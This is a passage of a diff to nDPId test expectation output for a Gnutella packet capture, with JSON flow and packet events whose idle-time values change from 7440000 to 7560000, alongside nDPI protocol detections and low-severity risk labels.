+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1277,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":3,"flow_last_seen":96685,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":96685,"pkt":"UlQAEjUCCAAn5uVZCABFAAA068VAAIAGCcsKAAIPXoaansRp03KjrVDkAAAAAIAC+vDifQAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1278,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":3,"flow_last_seen":96685,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":96685,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0IMxAAIAG1hsKAAIPY8eUBsRoEPJVbcPeAAAAAIAC+vCBnAAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":3,"flow_last_seen":96685,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":96685,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0aotAAIAGZIwKAAIP3XxCIcRqMwT80GtdAAAAAIAC+vDo1QAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1284,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":3,"flow_last_seen":97732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":97732,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QYRAAIAGx70KAAIPYteCnMRvMHWjnzXtAAAAAIAC+vC0KwAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1285,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":3,"flow_last_seen":97732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":97732,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QNRAAIAG5KQKAAIPVHZ0xsRurkgo6JHMAAAAAIAC+vBxaAAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1287,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":3,"flow_last_seen":98763,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":98763,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0nYNAAIAGGXUKAAIPSsPs+cRxSH3g2g3bAAAAAIAC+vA0rwAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1288,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":3,"flow_last_seen":98763,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":98763,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AqZAAIAGaHwKAAIPTHc3HMRwT3sv+xA+AAAAAIAC+vCQWAAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1293,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":3,"flow_last_seen":99778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":99778,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GY1AAIAGqNoKAAIPXwrNQ8R0LVPIsf8hAAAAAIAC+vCCJwAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1294,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":3,"flow_last_seen":99778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":99778,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AsFAAIAGpi4KAAIP1eVv4MSREwzLMAmEAAAAAIAC+vB1+AAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1295,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":3,"flow_last_seen":99778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":99778,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0MidAAIAGHAYKAAIPXjZCUsSB+JU5M3UyAAAAAIAC+vBcCwAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1296,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":3,"flow_last_seen":99778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":99778,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Rs5AAIAGRA0KAAIPyAeb0sRzbs28TEPZAAAAAIAC+vDQzwAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1297,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":3,"flow_last_seen":99778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":99778,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0O4NAAIAGzRIKAAIPTG6ZscSGnFbyaQhuAAAAAIAC+vAmPAAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":3,"flow_last_seen":99778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":99778,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gg9AAIAGKkQKAAIPSVn5CMRyxdmnmnGXAAAAAIAC+vCCMAAAAgQFtAEDAwgBAQQC"} 01405{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1320,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":2,"flow_last_seen":100920,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":100920,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBEAAAEARxyNeNkJSCgACD\/iVcAkC34d4LkYxAuq77b+oti7DkMaMrEQAAMACAAAGR1RLRwAA+wNHJRwgXbAuWugSpAUSxJsCHL8EXjZCUviVAQAAAAR+IhyrFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSA=="} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1450,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.105.27","src_port":28681,"dst_port":19260,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":101122,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":101122,"pkt":"UlQAEjUCCAAn5uVZCABFAABt2AwAAIARIW0KAAIPy9xpG3AJSzwAWVR20YMxAsOjfW6uj7unlpr730QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} @@ -1096,7 +1096,7 @@ 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1905,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":2,"flow_last_seen":106314,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":106314,"pkt":"UlQAEjUCCAAn5uVZCABFAABtDeEAAIARAL0KAAIPQh7dtXAJLuwAWUvy0dkxAnflHs8XZg0HoKrR0EQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1906,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":2,"flow_last_seen":106314,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":106314,"pkt":"UlQAEjUCCAAn5uVZCABFAABthP0AAIARBkIKAAIPLVh12nAJGv0AWUikdrExAmyl2\/D4Flpgn2PiMkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1907,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":2,"flow_last_seen":106314,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":106314,"pkt":"UlQAEjUCCAAn5uVZCABFAABtv\/wAAIAR2kwKAAIPucvaXHAJ3oIAWXW3EqAxAn\/MqZ\/PxBBVRWBQQEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1911,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90738,"flow_last_seen":106390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":106390,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.7.155.210","src_port":50291,"dst_port":28365,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1911,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90738,"flow_last_seen":106390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":106390,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.7.155.210","src_port":50291,"dst_port":28365,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":2,"flow_last_seen":111377,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":111377,"pkt":"UlQAEjUCCAAn5uVZCABFAABtaUIAAIARBHoKAAIPSIx4KXAJunsAWR8sGNIxAigwQqvDAye6DaSDvEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1942,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":111378,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":111378,"pkt":"UlQAEjUCCAAn5uVZCABFAABt\/AEAAIARkCAKAAIPWHhJ13AJX\/IAWXHaSscxAtAehZxkzy2fwIIymUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1945,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":111410,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":111410,"pkt":"UlQAEjUCCAAn5uVZCABFAABtEcUAAIARHzgKAAIPYPacfnAJxHkAWT0ZQMwxAkCcLpcbJhOCUhZqY0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} @@ -1109,16 +1109,16 @@ 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1958,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":2,"flow_last_seen":111540,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":111540,"pkt":"UlQAEjUCCAAn5uVZCABFAABtGY4AAIAR6JUKAAIPXwrNQ3AJLVMAWRLXRBcxAlgwW8d9kC2rZ7siq0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":3,"flow_last_seen":111540,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":111540,"pkt":"UlQAEjUCCAAn5uVZCABFAABtTIMAAIARTx0KAAIPy9zG9HAJBKoAWTL89yQxAua0C8l8g6aKgyk\/10QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1963,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":2,"flow_last_seen":111857,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":111857,"pkt":"UlQAEjUCCAAn5uVZCABFAABtOYAAAIAR2+4KAAIPSMnQOXAJltkAWbNfr0MxAtDKk1upIWPM3ig4bEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1968,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":114930,"flow_last_seen":114930,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":114930,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":114930,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":114930,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bAtAAIAGmk4KAAIPRXai5cSXtzoqx\/sEAAAAAIAC+vDeFgAAAgQFtAEDAwgBAQQC"} -00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1969,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":114930,"flow_last_seen":114930,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":114930,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":114930,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":114930,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0z\/pAAIAGGNQKAAIPvZNIU8SYZfyEcE5AAAAAAIAC+vBk5AAAAgQFtAEDAwgBAQQC"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1970,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":2,"flow_last_seen":115039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":115039,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsBeIAAEAGgIBFdqLlCgACD7c6xJcA8yoBKsf7BWAS\/\/\/XGAAAAgQFtA=="} -00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1971,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":3,"flow_last_seen":115039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":115039,"pkt":"UlQAEjUCCAAn5uVZCABFAAAobAxAAIAGmlkKAAIPRXai5cSXtzoqx\/sFAPMqAlAQ+vDz5AAA"} -00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1972,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":114930,"flow_last_seen":115040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":115040,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1974,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":2,"flow_last_seen":115124,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":115124,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsBeQAAEAGYvO9k0hTCgACD2X8xJgA9CQBhHBOQWAS\/\/9j5QAAAgQFtA=="} -00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1975,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":3,"flow_last_seen":115126,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":115126,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoz\/tAAIAGGN8KAAIPvZNIU8SYZfyEcE5BAPQkAlAQ+vCAsQAA"} -00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1976,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":114930,"flow_last_seen":115127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":115127,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1968,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":114930,"flow_last_seen":114930,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":114930,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":114930,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":114930,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bAtAAIAGmk4KAAIPRXai5cSXtzoqx\/sEAAAAAIAC+vDeFgAAAgQFtAEDAwgBAQQC"} +00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1969,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":114930,"flow_last_seen":114930,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":114930,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":114930,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":114930,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0z\/pAAIAGGNQKAAIPvZNIU8SYZfyEcE5AAAAAAIAC+vBk5AAAAgQFtAEDAwgBAQQC"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1970,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":2,"flow_last_seen":115039,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":115039,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsBeIAAEAGgIBFdqLlCgACD7c6xJcA8yoBKsf7BWAS\/\/\/XGAAAAgQFtA=="} +00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1971,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":3,"flow_last_seen":115039,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":115039,"pkt":"UlQAEjUCCAAn5uVZCABFAAAobAxAAIAGmlkKAAIPRXai5cSXtzoqx\/sFAPMqAlAQ+vDz5AAA"} 